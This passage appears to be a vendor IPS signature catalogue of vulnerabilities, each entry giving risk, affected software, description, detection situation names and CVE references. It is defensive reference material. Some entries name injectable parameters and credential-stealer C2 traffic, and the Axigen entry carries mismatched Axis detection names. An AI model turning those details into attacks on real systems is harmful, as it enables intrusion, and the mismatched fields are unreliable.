sgpkg-ips-275-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Mercur Messaging

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Atrium Software MERCUR IMAP service. A remote unauthenticated attacker can exploit this vulnerability by sending specially crafted data with the SUBSCRIBE command.

Situation:

IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Subscribe-Command

References:

CVE-2007-1579
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1579

BID-23050
http://www.securityfocus.com/bid/23050

OSVDB-33546
http://www.osvdb.org/33546

ATT-WinVNC-Client-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in ATT WinVNC Client.

Risk:

High

First detected in:

sgpkg-ips-662-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

VNC

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in ATT WinVNC client 3.3.3r7 and earlier which allows remote attackers to execute arbitrary commands via a long rfbConnFailed packet with a long reason string.

Situation:

Generic_SS-ATT-WinVNC-Client-Buffer-Overflow

References:

CVE-2001-0167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0167

BID-2305
http://www.securityfocus.com/bid/2305

OSVDB-6281
http://www.osvdb.org/6281

Attachmate-Reflection-FTP-Client-ActiveX-Getglobalsettings-Memory-Corruption

About this vulnerability:

A vulnerability in Attachmate INFOConnect Enterprise

Risk:

Moderate

First detected in:

sgpkg-ips-601-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Attachmate INFOConnect Enterprise; Attachmate Reflection FTP Client

Type:

Malfunction

Description:

A memory corruption vulnerability has been found in Attachmate Reflection FTP Client. The vulnerability is due to an attempt to dereference user-controllable parameter input. A remote, unauthenticated attacker could exploit this vulnerability by enticing a user to visit a malicious page. Successful exploitation could lead to arbitrary code execution under the security context of the browser.

Situation:

File-Text_Attachmate-Reflection-FTP-Client-ActiveX-Getglobalsettings-Memory-Corruption

References:

CVE-2014-0603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0603

OSVDB-109761
http://www.osvdb.org/109761

Attachmate-Reflection-FTP-Client-Pwd-Command-Buffer-Overflow

About this vulnerability:

A vulnerability in Attachmate Reflection FTP Client

Risk:

Moderate

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Attachmate Reflection FTP Client

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability exists in Attachmate Reflection FTP Client. The vulnerability is caused by insufficient boundary checking while processing PWD command responses. An attacker could exploit this vulnerability by enticing a user to access an FTP server that sends specially crafted PWD command responses. Successful exploitation could lead to arbitrary code execution under the security context of the currently logged on user.

Situation:

FTP_SS-Attachmate-Reflection-FTP-Client-Pwd-Command-Buffer-Overflow

References:

CVE-2014-5211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5211

OSVDB-117419
http://www.osvdb.org/117419

ATutor-Directory-Traversal-RCE

About this vulnerability:

A vulnerability in ATutor

Risk:

High

First detected in:

sgpkg-ips-1354-5242

Last changed:

sgpkg-ips-1354-5242

Platform:

Linux; Windows

Software:

ATutor

Type:

Input Validation

Description:

There exists a vulnerability in ATutor, versions 2.2.4, 2.2.2 and 2.2.1, which allows remote attackers to execute arbitrary code via a directory traversal flaw within language_import.php.

Situation:

File-Member-Name_ATutor-Directory-Traversal-RCE

References:

CVE-2019-12169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12169

ATutor-SQL-Injection

About this vulnerability:

An ATutor SQL Injection vulnerability.

Risk:

High

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ATutor

Type:

SQL Injection

Description:

A vulnerability in ATutor, version 2.2.1, which allows remote attackers to bypass authentication and upload malicious code.

Situation:

HTTP_CRL-ATutor-SQL-Injection

References:

CVE-2016-2555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2555

Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service

About this vulnerability:	A denial of service vulnerability in Aurigma Image Uploader
Risk:	Moderate
First detected in:	sgpkg-ips-138-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Aurigma Image Uploader
Type:	Resource Starvation
Description:	There is a buffer exhaustion vulnerability in the Aurigma Image Uploader ActiveX control. The flaw is due to a boundary error when processing excessively long parameters passed to the control. A remote attacker can exploit this vulnerability by persuading the target user to open a malicious web page. Successful exploitation may create a denial of service condition in the affected process.
Situation:	HTTP_SS-Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service File-Text_Aurigma-Image-Uploader-ActiveX-Control-Denial-Of-Service

Aurigma-Image-Uploader-Buffer-Overflow

About this vulnerability:

A vulnerability in Aurigma Image Uploader ActiveX control

Risk:

High

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Myspace Uploader; Aurigma Image Uploader

Type:

Buffer Overflow

Description:

Situation:

HTTP_SS-Aurigma-Image-Uploader-Buffer-Overflow
File-Text_Aurigma-Image-Uploader-Buffer-Overflow

References:

CVE-2008-0659
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0659

BID-27533
http://www.securityfocus.com/bid/27533

Authentium_Command_AntiVirus_odapi.dll_Multiple_Buffer_Overflows

About this vulnerability:

Buffer overflow vulnerabilities in Authentium Command Antivirus

Risk:

High

First detected in:

sgpkg-ips-110-2032

Last changed:

sgpkg-ips-1408-5242

Platform:

Windows

Software:

Authentium Command Antivirus

Type:

Buffer Overflow

Description:

There are multiple buffer overflow vulnerabilities in Authentium Command Antivirus. The vulnerability is in the odapi.dll ActiveX component included in the product.

References:

CVE-2007-2917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2917

BID-24255
http://www.securityfocus.com/bid/24255

OSVDB-36801
http://www.osvdb.org/36801

Autodesk-Autocad-Insecure-FAS-Loading

About this vulnerability:

A vulnerability in Autodesk AutoCAD

Risk:

High

First detected in:

sgpkg-ips-573-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Autodesk AutoCAD

Type:

Input Validation

Description:

A code execution vulnerability has been reported in AutoCAD. The vulnerability is due to using improper search path when loading FAS files. A remote attacker could exploit this vulnerability by enticing a user to process an FAS file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application.

Situation:

HTTP_CSU-Autodesk-Autocad-Request-To-Acad.FAS
HTTP_CSU-Autodesk-Autocad-Request-To-DWG-File
SMB-TCP_CHS-Autodesk-Autocad-Request-To-Acad.FAS
SMB-TCP_CHS-Autodesk-Autocad-Request-To-DWG-File

References:

CVE-2014-0818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0818

OSVDB-103585
http://www.osvdb.org/103585

Autodesk-Autocad-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Autodesk AutoCAD

Risk:

High

First detected in:

sgpkg-ips-574-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Autodesk AutoCAD

Type:

Input Validation

Description:

An insecure library loading vulnerability has been reported in AutoCAD. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to process an AutoCAD file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application.

Situation:

HTTP_CSU-Autodesk-Autocad-Request-To-Acdimres.dll
SMB-TCP_CHS-Autodesk-Autocad-Request-To-Acdimres.dll

References:

CVE-2014-0819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0819

OSVDB-103584
http://www.osvdb.org/103584

Autodesk-IDrop-ActiveX-Control-ControlFile-Buffer-Overflow

About this vulnerability:

A vulnerability in Autodesk i-drop ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Autodesk i-drop

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Autodesk i-drop ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of various methods. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows for arbitrary code injection and execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-Autodesk-IDrop-ActiveX-Control-Control-Buffer-Overflow
File-Text_Autodesk-IDrop-ActiveX-Control-Control-Buffer-Overflow

References:

BID-34352
http://www.securityfocus.com/bid/34352

OSVDB-53265
http://www.osvdb.org/53265

Autodesk-Liveupdate-ActiveX-Control-Code-Execution

About this vulnerability:

A vulnerability in ActiveX control of Autodesk Liveupdate

Risk:

High

First detected in:

sgpkg-ips-174-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Autodesk Revit Architecture; Autodesk Design Review

Type:

Input Validation

Description:

There is a code execution vulnerability in the Autodesk LiveUpdate ActiveX Control shipped with multiple products. The vulnerability is due to a lack of sanitation while handling parameters passed to the ApplyPatch method. A remote attacker could exploit the vulnerability by enticing the target user to open a malicious HTML document. Successful exploitation causes arbitrary command execution in the security context of the currently logged on user.

Situation:

HTTP_SS-Autodesk-Liveupdate-ActiveX-Control-Code-Execution
File-Text_Autodesk-Liveupdate-ActiveX-Control-Code-Execution

References:

BID-31490
http://www.securityfocus.com/bid/31490

AutoIt-Compiled-Program-Traffic

About this vulnerability:	AutoIt compiled program traffic was detected
Risk:	Moderate
First detected in:	sgpkg-ips-1183-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	AutoIt is a programming language for Microsoft Windows. In addition to legitimate purposes like automation, it is also used by malware writers to create malicious software.
Situation:	HTTP_CRH-AutoIt-Compiled-Program-Traffic

Automated-Solutions-Modbus_DoS

About this vulnerability:	A vulnerability in Automated Solutions Modbus/TCP OPC Server Remote Heap Corruption PoC
Risk:	High
First detected in:	sgpkg-ips-613-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows;Linux
Software:	Modbus SCADA
Type:	Malfunction
Description:	A vulnerability exists in Automated Solutions Modbus, Remote Heap Corruption, which allows for a DoS attack.
Situation:	Generic_SS-Automated-Solutions-Modbus_DoS

Automattic-Woocommerce-Blocks-Wordpress-Plugin-Store-API-SQL-Injection

About this vulnerability:

A vulnerability in Automattic WooCommerce Blocks feature plugin

Risk:

Moderate

First detected in:

sgpkg-ips-1377-5242

Last changed:

sgpkg-ips-1377-5242

Platform:

Generic

Software:

Automattic WooCommerce

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in the WooCommerce Blocks feature WordPress plugin. Successful exploitation could lead in information disclosure.

Situation:

HTTP_CSU-Automattic-Woocommerce-Blocks-Wordpress-Plugin-Store-API-SQL-Injection

References:

CVE-2021-32789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-32789

Autonomy-Connected-Backup-Type-13-Command-Injection

About this vulnerability:

A vulnerability in Autonomy Connected Backup

Risk:

Moderate

First detected in:

sgpkg-ips-430-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Autonomy Connected Backup

Type:

Input Validation

Description:

A code execution vulnerability has been reported in Autonomy Connected Backup. The vulnerability is due to insufficient validation of commands contained in "Type 13" messages. A remote, unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted Type 13 command to an affected system.

Situation:

Generic_CS-Autonomy-Connected-Backup-Type-13-Command-Injection

References:

CVE-2011-2397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2397

OSVDB-77495
http://www.osvdb.org/77495

Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow

About this vulnerability:

A vulnerability in IBM Lotus Notes

Risk:

High

First detected in:

sgpkg-ips-247-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Lotus Notes; Autonomy KeyView IDOL Viewing SDK

Type:

Integer Overflow

Description:

There is an integer overflow vulnerability in the Autonomy KeyView Viewing SDK. The vulnerability is due to an error when parsing a Shared String Table (SST) record inside of an Excel file. A remote attacker could exploit this vulnerability by enticing the target user to open or view a malicious Excel file with the vulnerable version of the product. Successful exploitation results in execution of arbitrary code in the security context of the currently logged-in user. An unsuccessful attempt terminates the affected application abnormally.

Situation:

E-Mail_BS-Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
HTTP_SS-Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow
File-OLE_Autonomy-Keyview-Excel-File-Sst-Parsing-Integer-Overflow

References:

BID-36042
http://www.securityfocus.com/bid/36042

Avast!-AntiVirus-ACE-File-Handling-Buffer-Overflow

About this vulnerability:

A vulnerability in ALWIL Software Avast! AntiVirus

Risk:

High

First detected in:

sgpkg-ips-607-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Avast Antivirus

Type:

Malfunction

Description:

There exists a stack-based buffer overflow vulnerability in avast! antivirus. The vulnerability is a result of improper boundary checking when scanning ACE files. An attacker can exploit this vulnerability to inject and execute arbitrary code. Any code injected will be executed with the privileges of the antivirus service, normally System. In a simple attack case aimed at creating a denial of service condition, only the affected thread will terminate. The vulnerable program as a whole will still function normally. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the affected process, normally System.

Situation:

File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow
File-Binary_AntiVirus-ACE-File-Handling-Buffer-Overflow-2

References:

CVE-2005-2385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2385

BID-14342
http://www.securityfocus.com/bid/14342

Avast-AntiVirus-Engine-Remote-Lha-Buffer-Overflow

About this vulnerability:	A vulnerability in ALWIL Software Avast! Antivirus
Risk:	Moderate
First detected in:	sgpkg-ips-368-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Avast Antivirus
Type:	Buffer Overflow
Description:	There exists a buffer overflow vulnerability in the Avast! Antivirus product line. The flaw exists due to insufficient verification of file and directory names in LHA archives. An attacker may leverage this vulnerability to disable the virus scanning service on the target host, or to inject and execute arbitrary code within the security context of the virus scanning process. Upon receiving a simple attack, the thread of the vulnerable product will crash when it try to scan the malicious LHA archive. This may create a denial of service condition to the antivirus protection provided by the affected product, allowing other malicious content being delivered to and from the target host. In an improbable case where code injection is successful, the flow of the process is diverted to the injected code and the attacker may execute arbitrary code on the target system. In such a case, the behaviour of the target host is dependent on the intention of the injected code. Any code executed will be within the privileges of the current service process, which is System by default.
Situation:	HTTP_SS-Avast-AntiVirus-Engine-Lha-Buffer-Overflow File-Binary_Avast-AntiVirus-Engine-Lha-Buffer-Overflow

Avast-AntiVirus-X.509-Certificate-Common-Name-Remote-Command-Execution

About this vulnerability:	A vulnerability in AVAST Software Antivirus
Risk:	High
First detected in:	sgpkg-ips-698-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Avast Antivirus
Type:	Input Validation
Description:	There exists a remote command execution vulnerability in Avast Antivirus. A bad server can deliver a malicious certificate which triggers the vulnerability resulting in arbitrary command execution.
Situation:	HTTPS_SS-Avast-AntiVirus-X.509-Certificate-Common-Name-Remote-Command-Execution

Avaya-IP-Office-Customer-Call-Reporter-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Avaya IP Office Customer Call Reporter

Risk:

High

First detected in:

sgpkg-ips-496-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Avaya IP Office Customer Call Reporter

Type:

Input Validation

Description:

A vulnerability has been reported in Avaya's IP Office Customer Call Reporter. The vulnerability is due to the ImageUpload.ashx page failing to restrict the content uploaded to a server. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted web request by way of the ImageUpload.ashx resource. A successful exploitation attempt could result in the execution of arbitrary code in the security context of the web server.

Situation:

HTTP_CRL-Avaya-IP-Office-Customer-Call-Reporter-Unrestricted-File-Upload

References:

CVE-2012-3811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3811

BID-54225
http://www.securityfocus.com/bid/54225

OSVDB-83399
http://www.osvdb.org/83399

Avaya-Winpdm-Unite-Host-Router-Service-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Avaya Windows Portable Device Manager

Risk:

Moderate

First detected in:

sgpkg-ips-438-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Avaya Windows Portable Device Manager

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Avaya Windows Portable Device Manager which is an application used to configure Avaya IP DECT phones. The vulnerability is due to a boundary error when the Unite Host Router Service processes UTP requests. An attacker can exploit this vulnerability by sending specially crafted requests to the affected application. Successful exploitation could result in arbitrary code execution in the context of the affected service.

Situation:

Generic_UDP-Avaya-Winpdm-Unite-Host-Router-Service-Stack-Buffer-Overflow

References:

BID-47947
http://www.securityfocus.com/bid/47947

OSVDB-73269
http://www.osvdb.org/73269

AveMaria-Stealer-C2-Traffic

About this vulnerability:	Avemaria Stealer C2 Traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1183-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	AveMaria is a stealer capable to collect credentials from the infected system.
Situation:	Generic_CS-AveMaria-Stealer-C2-Traffic

AVI-DirectX-DirectShow-AVI-Strn-BOF

About this vulnerability:

Buffer overflow vulnerability DirectX DirectShow AVI handling

Risk:

High

First detected in:

sgpkg-ips-44-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

DirectX

Type:

Buffer Overflow

Description:

DirectX DirectShow parses incorrectly AVI files with a malformed STRN chunk. A STRN chunk in an AVI contains a null-terminated string describing the file and the length of the string. DirectShow checks that the string is null-terminated and overwrites the strings last byte with null if it is not. The string length is not validated before overwriting, allowing a malicious AVI file to write a null-byte into an arbitrary memory location.

Situation:

HTTP_AVI-DirectX-DirectShow-AVI-Strn-BOF
File-RIFF_Microsoft-Windows-AVI-DirectX-DirectShow-AVI-Strn-Buffer-Overflow

References:

CVE-2005-2128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2128

BID-15063
http://www.securityfocus.com/bid/15063

OSVDB-18822
http://www.osvdb.org/18822

MS05-050
http://technet.microsoft.com/security/bulletin/MS05-050

Aviatrix-Controller-Command-Injection-CVE-2024-50603

About this vulnerability:

An attempt to exploit a vulnerability in Aviatrix Controller detected

Risk:

High

First detected in:

sgpkg-ips-1825-5242

Last changed:

sgpkg-ips-1825-5242

Platform:

Generic

Software:

Aviatrix Controller

Type:

Input Validation

Description:

An issue was discovered in Aviatrix Controller before 7.1.4191 and 7.2.x before 7.2.4996. Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to "/v1/api" in "cloud_type" parameter for "list_flightpath_destination_instances" action, or "src_cloud_type" parameter for "flightpath_connection_test" action.

Situation:

HTTP_CRL-Aviatrix-Controller-Command-Injection-CVE-2024-50603

References:

CVE-2024-50603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50603

Aviatrix-Controller-File-Upload-CVE-2021-40870

About this vulnerability:

An attempt to exploit a vulnerability in Aviatrix Controller

Risk:

Moderate

First detected in:

sgpkg-ips-1428-5242

Last changed:

sgpkg-ips-1428-5242

Platform:

Generic

Software:

Aviatrix Controller

Type:

Malfunction

Description:

A file upload vulnerability in Aviatrix Controller

Situation:

HTTP_CRL-Aviatrix-Controller-File-Upload-CVE-2021-40870

References:

CVE-2021-40870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870

Avid-Media-Composer-Stack-Based-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in Avid Media Composer detected

Risk:

High

First detected in:

sgpkg-ips-656-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Avid Media Composer

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Avid Media Composer 5.5.3 and before, within AvidPhoneticIndexer.exe, which allows remote attackers to execute arbitrary code via a long request.

Situation:

Generic_CS-Avid-Media-Composer-Stack-Based-Buffer-Overflow

References:

CVE-2011-5003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5003

BID-50843
http://www.securityfocus.com/bid/50843

OSVDB-77376
http://www.osvdb.org/77376

Avideo-WWBNIndex-Plugin-Unauthenticated-RCE

About this vulnerability:

An attempt to exploit a vulnerability in WWBN AVideo detected

Risk:

High

First detected in:

sgpkg-ips-1732-5242

Last changed:

sgpkg-ips-1732-5242

Platform:

Windows; Unix

Software:

WWBN AVideo

Type:

Input Validation

Description:

A vulnerability in the WWBNIndex plugin of the AVideo platform which allows remote attackers to execute arbitrary code though submitIndex.php due to insufficient input validation.

Situation:

HTTP_CRL-Avideo-WWBNIndex-Plugin-Unauthenticated-RCE

References:

CVE-2024-31819
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31819

Aviosys-IP-POWER-9258-W2-Information-Disclosure

About this vulnerability:	A vulnerability in Aviosys IP POWER 9258 W2
Risk:	High
First detected in:	sgpkg-ips-610-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	IP POWER 9258 W2
Type:	Input Validation
Description:	A vulnerability in some versions of Aviosys IP POWER 9258 W2 could lead to information disclosure.
Situation:	File-Text_Aviosys-IP-POWER-9258-W2-Information-Disclosure

Avira-Management-Console-Server-HTTP-Header-Processing-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in AVIRA Management Console Server
Risk:	High
First detected in:	sgpkg-ips-710-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Avira Management Console
Type:	Buffer Overflow
Description:	A heap buffer overflow vulnerability has been reported in Avira Management Console Server. The vulnerability exists in the way Update Manager Service handles overly long HTTP headers. A remote unauthenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the server. Successful exploitation could lead to arbitrary code execution in the security context of System.
Situation:	HTTP_Client-Header-Name-Too-Long HTTP_Client-Header-Name-Too-Long

Avtech-IP-Camera-AVM1203-Command-Injection-CVE-2024-7029

About this vulnerability:

A vulnerability in AVTECH IP camera AVM1203

Risk:

High

First detected in:

sgpkg-ips-1772-5242

Last changed:

sgpkg-ips-1772-5242

Platform:

Generic

Software:

AVTECH IP camera AVM1203

Type:

Input Validation

Description:

A command injection vulnerability in the firmware of the AVTECH IP camera model AVM1203 allows unauthenticated remote command execution.

Situation:

HTTP_CRL-Avtech-IP-Camera-AVM1203-Command-Injection-CVE-2024-7029

References:

CVE-2024-7029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7029

Avtech-IP-Camera-Cgi-Bin-Nobody-Access

About this vulnerability:	A vulnerability in multiple versions of the AVTECH IP camera firmware
Risk:	Moderate
First detected in:	sgpkg-ips-1772-5242
Last changed:	sgpkg-ips-1772-5242
Platform:	Generic
Software:	AVTECH IP camera
Type:	Malfunction
Description:	Multiple versions of the AVTECH IP camera firmware allow unauthenticated access to the cgi scripts in the /cgi-bin/nobody folder if /nobody is included anywhere in the request URI.
Situation:	HTTP_CSU-Avtech-IP-Camera-Cgi-Bin-Nobody-Access

Avtech-IP-Camera-Multiple-Command-Injection-Vulnerabilities

About this vulnerability:	Multiple vulnerabilities in AVTECH IP camera firmware
Risk:	High
First detected in:	sgpkg-ips-1772-5242
Last changed:	sgpkg-ips-1772-5242
Platform:	Generic
Software:	AVTECH IP camera
Type:	Input Validation
Description:	Various unauthenticated and authenticated command injection vulnerabilities without CVE identifiers have been reported in multiple versions of the AVTECH IP camera firmware.
Situation:	HTTP_CRL-Avtech-IP-Camera-Multiple-Command-Injection-Vulnerabilities

AwindInc-SNMP-Service-Command-Injection

About this vulnerability:

A vulnerability in AwindInc

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AwindInc

Type:

Input Validation

Description:

A vulnerability in AwindInc and OEM'ed products, multiple versions, which allows remote attackers to execute arbitrary code due to the lack of user input validation.

Situation:

SNMP-UDP_AwindInc-SNMP-Service-Command-Injection

References:

CVE-2017-16709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16709

AwingSoft-Winds3D-Player-Command-Execution

About this vulnerability:

An AwingSoft Winds3D Player Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-722-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP SP3

Software:

AwingSoft Winds3D Player

Type:

Input Validation

Description:

A vulnerability in AwingSoft Winds3D Player Plugin, version 3.5.0.9 for Firefox 3.5 and IE 8, which allows remote attackers to execute arbitrary executable files, due to the failure of SceneURL() to validate input.

Situation:

File-Text_AwingSoft-Winds3D-Player-Command-Execution

References:

CVE-2009-4850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4850

OSVDB-60049
http://www.osvdb.org/60049

AwingSoft-Winds3D-Player-SceneURL-Buffer-Overflow

About this vulnerability:

An AwingSoft Winds3D Player SceneURL Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-722-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

AwingSoft Winds3D Player

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in AwingSoft Winds3D Player Plugin, version 3.5.0.0 and before, which allows remote attackers to execute arbitrary executable files via a long SceneUrl property value.

Situation:

File-Text_AwingSoft-Winds3D-Player-SceneURL-Buffer-Overflow

References:

CVE-2009-4588
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4588

OSVDB-60017
http://www.osvdb.org/60017

Awstats-Migrate-Remote-Command-Execution

About this vulnerability:

Awstats-Migrate Remote Command Execution 6.4 and 6.5

Risk:

High

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

AWStats

Type:

Code Injection

Description:

A vulnerability in the AWStats 6.4 and 6.5 CGI script which allows a remote attacker to execute arbitrary code via shell metacharacters in the migrate parameter.

Situation:

HTTP_CSU-Awstats-Migrate-Remote-Command-Execution

References:

CVE-2006-2237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2237

BID-17844
http://www.securityfocus.com/bid/17844

OSVDB-25284
http://www.osvdb.org/25284

Awstats-Totals-Remote-Code-Execution

About this vulnerability:

An Awstats Totals Remote Code Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

AWStats

Type:

Input Validation

Description:

A vulnerability in AWStats Totals, versions 1.0 through 1.14, which allows remote attacker to execute arbitrary code via PHP sequences in the sort parameter.

Situation:

HTTP_CSU-Awstats-Totals-Remote-Code-Execution

References:

CVE-2008-3922
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922

BID-30856
http://www.securityfocus.com/bid/30856

OSVDB-47807
http://www.osvdb.org/47807

Axigen-Free-Mail-Server-Directory-Traversal

About this vulnerability:

An Axigen Free Mail Server Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Axigen

Type:

Directory Traversal

Description:

A directory traversal vulnerability in the View Log Files component in Axigen Free Mail Server which allows remote attackers to read or delete arbitrary files via a dot-dot )..) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the edit action or delete action to the default URI.

Situation:

HTTP_Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
HTTP_SS-Axis-Communications-Camera-Control-ActiveX-Object
File-Text_Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow
File-Text_Axis-Communications-Camera-Control-ActiveX-Object

References:

CVE-2012-4940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4940

BID-56343
http://www.securityfocus.com/bid/56343

OSVDB-86802
http://www.osvdb.org/86802

Axis-Camera-Control-ActiveX-Control-SetBMP-Buffer-Overflow

About this vulnerability:

A vulnerability in AXIS Camera Control ActiveX control

Risk:

High

First detected in:

sgpkg-ips-115-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

AXIS Camera Control

Type:

Buffer Overflow

Description:

There is a vulnerability in the AXIS Camera Control ActiveX control. The vulnerability is due to insufficient validation of user-supplied parameters.

Situation:

References:

CVE-2007-2239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2239

BID-23816
http://www.securityfocus.com/bid/23816

OSVDB-35602
http://www.osvdb.org/35602

Axis-Communications-Camera-Control-Image-Pan-Tilt-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in AXIS Communications AXIS Camera Control

Risk:

High

First detected in:

sgpkg-ips-254-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

AXIS Camera Control

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Camera Control ActiveX by AXIS Communications. The vulnerability is due to a boundary error in the handling of the "image_pan_tilt" property of the control. As a result of this, heap-based buffer overflow can occur which will allow arbitrary code injections and execution in the context of the current user.

Situation:

HTTP_SS-Axis-Communications-Camera-Control-ActiveX-Object
File-Text_Axis-Communications-Camera-Control-ActiveX-Object

References:

CVE-2008-5260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5260

BID-33408
http://www.securityfocus.com/bid/33408

OSVDB-51532
http://www.osvdb.org/51532

Axis-IP-Camera-Application-Upload

About this vulnerability:	A vulnerability in Axis IP cameras.
Risk:	High
First detected in:	sgpkg-ips-1445-5242
Last changed:	sgpkg-ips-1445-5242
Platform:	Linux
Software:	AXIS Camera Application Platform
Type:	Insecure Configuration
